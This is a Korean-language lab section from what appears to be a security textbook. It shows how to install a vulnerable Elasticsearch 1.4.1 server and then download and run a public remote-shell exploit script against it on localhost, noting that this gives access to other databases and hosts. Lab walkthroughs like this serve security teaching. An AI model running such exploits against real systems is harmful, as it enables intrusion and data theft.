3.8.1 Elastic Search 실습

취약한 Elastic Search 서비스를 구축해 테스트하려면, 다음 과정을 따라 설치해야 한다.

update-java-alternatives --jre -s java-1.7.0-openjdk-i386

wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.1.zip

unzip elasticsearch-1.4.1.zip

cd elasticsearch-1.4.1/bin/

./plugin -i elasticsearch/marvel/latest

./elasticsearch

일단 elasticsearch가 실행되고 있으면, 공격 코드를 다운로드해 실행할 수 있다.

wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/ElasticSearch/elastic_shell.py

chmod +x ./elastic_shell.py

python ./elastic_shell.py localhost

그리고 다른 데이터베이스에 침투해서 수많은 호스트에서 접근 권한을 획득할 수 있다.